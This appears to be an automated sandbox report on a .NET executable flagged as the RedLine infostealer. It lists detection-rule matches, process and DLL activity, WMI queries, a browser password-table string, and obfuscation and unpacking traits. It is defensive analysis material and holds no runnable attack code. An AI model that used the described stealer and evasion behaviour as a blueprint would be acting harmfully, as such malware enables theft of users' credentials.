Source: 0.2.qJ64p5G1XJ.exe.37d4128.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.2.qJ64p5G1XJ.exe.37d4128.2.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 0.2.qJ64p5G1XJ.exe.37d4128.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.qJ64p5G1XJ.exe.37d4128.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.2.qJ64p5G1XJ.exe.37d4128.2.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 0.2.qJ64p5G1XJ.exe.37d4128.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.qJ64p5G1XJ.exe.426b178.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.2.qJ64p5G1XJ.exe.426b178.1.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 0.2.qJ64p5G1XJ.exe.426b178.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.qJ64p5G1XJ.exe.426b178.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.2.qJ64p5G1XJ.exe.426b178.1.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 0.2.qJ64p5G1XJ.exe.426b178.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000000.00000002.1735815535.00000000037D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 00000004.00000002.1856995475.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 00000000.00000002.1735815535.000000000426B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: qJ64p5G1XJ.exe PID: 6900, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: qJ64p5G1XJ.exe PID: 2196, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23

Source: qJ64p5G1XJ.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.qJ64p5G1XJ.exe.ae10000.5.raw.unpack, v1eEeTNS09b9ZWBTUt.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.qJ64p5G1XJ.exe.ae10000.5.raw.unpack, v1eEeTNS09b9ZWBTUt.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.qJ64p5G1XJ.exe.4173ff8.0.raw.unpack, v1eEeTNS09b9ZWBTUt.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.qJ64p5G1XJ.exe.4173ff8.0.raw.unpack, v1eEeTNS09b9ZWBTUt.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.qJ64p5G1XJ.exe.41d0018.3.raw.unpack, OncGk5i7SEJSZ1ogJW.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.qJ64p5G1XJ.exe.41d0018.3.raw.unpack, OncGk5i7SEJSZ1ogJW.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.qJ64p5G1XJ.exe.41d0018.3.raw.unpack, OncGk5i7SEJSZ1ogJW.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.qJ64p5G1XJ.exe.41d0018.3.raw.unpack, v1eEeTNS09b9ZWBTUt.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.qJ64p5G1XJ.exe.41d0018.3.raw.unpack, v1eEeTNS09b9ZWBTUt.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.qJ64p5G1XJ.exe.ae10000.5.raw.unpack, OncGk5i7SEJSZ1ogJW.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.qJ64p5G1XJ.exe.ae10000.5.raw.unpack, OncGk5i7SEJSZ1ogJW.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.qJ64p5G1XJ.exe.ae10000.5.raw.unpack, OncGk5i7SEJSZ1ogJW.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.qJ64p5G1XJ.exe.4173ff8.0.raw.unpack, OncGk5i7SEJSZ1ogJW.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.qJ64p5G1XJ.exe.4173ff8.0.raw.unpack, OncGk5i7SEJSZ1ogJW.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.qJ64p5G1XJ.exe.4173ff8.0.raw.unpack, OncGk5i7SEJSZ1ogJW.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@8/45@1/2

Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\qJ64p5G1XJ.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Mutant created: NULL
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Mutant created: \Sessions\1\BaseNamedObjects\biyNScpVt
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1508:120:WilError_03

Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe

File created: C:\Users\user\AppData\Local\Temp\tmpE4CC.tmp

Jump to behavior

Source: qJ64p5G1XJ.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: qJ64p5G1XJ.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'

Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: tmp1E8B.tmp.4.dr, tmpE4DD.tmp.4.dr, tmp1E9D.tmp.4.dr, tmp1E8C.tmp.4.dr, tmpE4CC.tmp.4.dr, tmp1E9E.tmp.4.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: qJ64p5G1XJ.exe

ReversingLabs: Detection: 71%

Source: unknown	Process created: C:\Users\user\Desktop\qJ64p5G1XJ.exe "C:\Users\user\Desktop\qJ64p5G1XJ.exe"
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process created: C:\Users\user\Desktop\qJ64p5G1XJ.exe "C:\Users\user\Desktop\qJ64p5G1XJ.exe"
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process created: C:\Users\user\Desktop\qJ64p5G1XJ.exe "C:\Users\user\Desktop\qJ64p5G1XJ.exe"
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process created: C:\Users\user\Desktop\qJ64p5G1XJ.exe "C:\Users\user\Desktop\qJ64p5G1XJ.exe"
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process created: C:\Users\user\Desktop\qJ64p5G1XJ.exe "C:\Users\user\Desktop\qJ64p5G1XJ.exe"	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process created: C:\Users\user\Desktop\qJ64p5G1XJ.exe "C:\Users\user\Desktop\qJ64p5G1XJ.exe"	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process created: C:\Users\user\Desktop\qJ64p5G1XJ.exe "C:\Users\user\Desktop\qJ64p5G1XJ.exe"	Jump to behavior

Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Section loaded: windowscodecs.dll	Jump to behavior

Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: qJ64p5G1XJ.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: qJ64p5G1XJ.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: qJ64p5G1XJ.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: xVmy.pdbSHA256! source: qJ64p5G1XJ.exe
Source:	Binary string: xVmy.pdb source: qJ64p5G1XJ.exe

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.qJ64p5G1XJ.exe.4173ff8.0.raw.unpack, OncGk5i7SEJSZ1ogJW.cs	.Net Code: ejke8Qs48r System.Reflection.Assembly.Load(byte[])
Source: 0.2.qJ64p5G1XJ.exe.41d0018.3.raw.unpack, OncGk5i7SEJSZ1ogJW.cs	.Net Code: ejke8Qs48r System.Reflection.Assembly.Load(byte[])
Source: 0.2.qJ64p5G1XJ.exe.6990000.4.raw.unpack, MainForm.cs	.Net Code: _206D_206A_206B_200E_200F_206F_206E_200C_200F_202B_202E_206A_200C_202A_200C_206D_200C_206F_200C_206E_202E_200B_202B_200D_206C_206C_200E_200D_200D_200F_206D_206F_206A_206F_200D_206C_202C_206D_206C_206C_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.qJ64p5G1XJ.exe.ae10000.5.raw.unpack, OncGk5i7SEJSZ1ogJW.cs	.Net Code: ejke8Qs48r System.Reflection.Assembly.Load(byte[])

Source: qJ64p5G1XJ.exe

Static PE information: 0x8C603CDE [Thu Aug 18 07:14:38 2044 UTC]

Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Code function: 0_2_069908BC push ecx; ret	0_2_069908BD
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Code function: 0_2_06993EFD push ebx; iretd	0_2_06993EFF
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Code function: 0_2_06991181 push dword ptr [69202F34h]; ret	0_2_069911A6
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Code function: 0_2_06991BD9 push ss; ret	0_2_06991BDA
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Code function: 0_2_00E68999 push ebp; iretd	0_2_00E689B5

Source: qJ64p5G1XJ.exe

Static PE information: section name: .text entropy: 7.50764095997495

Source: 0.2.qJ64p5G1XJ.exe.4173ff8.0.raw.unpack, hGp5BZpcONDkD3rFIh.cs	High entropy of concatenated method names: 'zkfKBrMmc6', 'CMJKtdTixl', 'ToString', 'GRUKJpvLL2', 'EbXKOWhEn4', 'gPNKhEqG0f', 'mWBKXJS5AF', 'io3KQY9uBg', 'PYCKmD6RW3', 'K0oKiP2iDb'
Source: 0.2.qJ64p5G1XJ.exe.4173ff8.0.raw.unpack, CTpjKLHHStIX6nENSqD.cs	High entropy of concatenated method names: 'J0VC7O2PEY', 'QTLCzGo5SI', 'FrBkPDLd0F', 'B6QkHddJZQ', 'BjAk1ybxOu', 'e8ekxZUfsn', 'ykZke2SpQT', 'AM3ka5iDV0', 'PfPkJm7agE', 'PtbkORYwmH'
Source: 0.2.qJ64p5G1XJ.exe.4173ff8.0.raw.unpack, DhS7fqukG0sd39wKtf.cs	High entropy of concatenated method names: 'nYShfwcvRI', 'ewmhjUlaNe', 'vwqhN5LwsR', 'P0jhuIFogB', 'SLuhocKTGZ', 'w7vhA9VZH5', 'ekthKYem8h', 'a2lhTd9I1s', 'MVbhvcVHgT', 'c6ChCkI0Sc'
Source: 0.2.qJ64p5G1XJ.exe.4173ff8.0.raw.unpack, OncGk5i7SEJSZ1ogJW.cs	High entropy of concatenated method names: 'bNlxamUKy4', 'miAxJHaJSO', 'mMexOwQYLh', 'J7Sxh1ExdY', 'utyxXI9rcw', 'm88xQCr2TF', 'rHhxm5Bppa', 'MInxic36Wp', 'HDZxsWiQ3w', 'yLLxBp4ILQ'
Source: 0.2.qJ64p5G1XJ.exe.4173ff8.0.raw.unpack, cStMQWrAe62kFjA8iB.cs	High entropy of concatenated method names: 'NVqmU0BYEO', 'jyvmbdIZ6q', 'wWEm8qcJKU', 'mUImfsxBCn', 'ITUmcHac4a', 'D2hmjmEg8a', 'LQYmFuDnyk', 'hRLmN11udK', 'kn0muo1wAZ', 'Ql8my6jStE'
Source: 0.2.qJ64p5G1XJ.exe.4173ff8.0.raw.unpack, pNgHLgHeW5AW01sHXe4.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'UVcYvJEvJ0', 'yBiYCg1YEJ', 'atEYkJVQmh', 'pclYYf0QUb', 'K8KYDxRcMV', 'UuGY20hxxx', 'fOiY96HZ6r'
Source: 0.2.qJ64p5G1XJ.exe.4173ff8.0.raw.unpack, tfgn1S3iqgrvDvDCf6.cs	High entropy of concatenated method names: 'ToString', 'pDCAGt35RS', 'WNhAM02Jw0', 'j6OAZKyEEd', 'tn7AE9h7f2', 'gAKAnTroAb', 'k60AIf3bn4', 'jaXASjOQPC', 'nfcA4A9GMD', 'zCNArTDOeO'
Source: 0.2.qJ64p5G1XJ.exe.4173ff8.0.raw.unpack, MIhYti525Ikkbjqrcs.cs	High entropy of concatenated method names: 'ADZKg79M1a', 'e7UK78Eyda', 'h9xTPU5hsK', 'rDcTHI9Tqy', 'WbfKG88s9y', 'F5JK0SrJJ5', 'AhRKWLX0Hy', 'gQNKRIUXD7', 'KXkKwDa4u9', 's7hK3MpyTV'
Source: 0.2.qJ64p5G1XJ.exe.4173ff8.0.raw.unpack, JR2Okb13aVOWuLqDw8.cs	High entropy of concatenated method names: 'r5x80NXcL', 'keafNoF1W', 'GHajDHZlf', 'gB6F0yF8f', 'EJfutf0Ds', 'tToyT5mhw', 'p3YaNRxkNpMGrWQqjD', 'nK5CqTeVpB2Yd8T1KX', 'Ih8TCeuXA', 'hAJCuJIqX'
Source: 0.2.qJ64p5G1XJ.exe.4173ff8.0.raw.unpack, gnC4U367rNO1DaP00g.cs	High entropy of concatenated method names: 'QD4vqphdHN', 'gx8vMLRm20', 'frwvZ1CDlb', 'y8nvEDrbhK', 'kd1vnArc6O', 'SZkvIxDZMD', 'owUvS0cgO1', 'h9av4LI0hP', 'OvWvrBwSqG', 'X50vVb20Xn'
Source: 0.2.qJ64p5G1XJ.exe.4173ff8.0.raw.unpack, dpaLf0Re3AGi0r97Pm.cs	High entropy of concatenated method names: 'WUCoVbwx8B', 'heNo0KZjop', 'IHXoRAS3v9', 'C6GownlOrf', 'f3NoMdMDsN', 'e8LoZRNDFG', 'wWHoE2Xt7B', 'w28onnTdOG', 'hOmoII5e1E', 'mJioSV9ONR'
Source: 0.2.qJ64p5G1XJ.exe.4173ff8.0.raw.unpack, fsa6uMznVbEZIPKdyx.cs	High entropy of concatenated method names: 'uQACjIUEBT', 'gbECNqgucm', 'auECuOQF5o', 'hfDCqxt4Lb', 'mwuCMpt6VF', 'vYhCElJoqK', 'IewCnDeJcn', 'NefC9rtIhf', 'KrCCUnXlLW', 'H3sCbb9YAx'
Source: 0.2.qJ64p5G1XJ.exe.4173ff8.0.raw.unpack, HpsXv37b3vcqkDIH3g.cs	High entropy of concatenated method names: 'MUuChsdQEQ', 'DIrCXFtker', 's8wCQ0GNQV', 'UUJCmqWq63', 'BjCCvTsVxD', 'KYuCite76k', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.qJ64p5G1XJ.exe.4173ff8.0.raw.unpack, xPR18VqNchfk1GBVjj.cs	High entropy of concatenated method names: 'DbeQanGYqC', 'rtyQO5ltSc', 'aq0QXweO2l', 'hPfQmL2UhK', 'iLBQi8Hj7q', 'iGvXLG6cC6', 'h3ZX5Bkxh8', 'HYkXlxR40K', 'SlsXgs9dEr', 'In8X6nml6Z'
Source: 0.2.qJ64p5G1XJ.exe.4173ff8.0.raw.unpack, nccvMUSwlgQukfpKG6.cs	High entropy of concatenated method names: 'DQBmJZ20kL', 'M5pmh6laMj', 'fYDmQm43U0', 'rS2Q7pfof4', 'tSQQz4rYow', 'cQ7mPSfRwB', 'DwlmHnVaZr', 'zjRm1Rj4d6', 'Rb3mxbHuj5', 'dVgmeeE3Pn'
